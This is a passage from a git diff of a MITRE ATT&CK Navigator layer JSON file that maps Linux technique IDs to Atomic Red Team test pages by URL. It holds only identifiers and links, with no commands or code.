master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,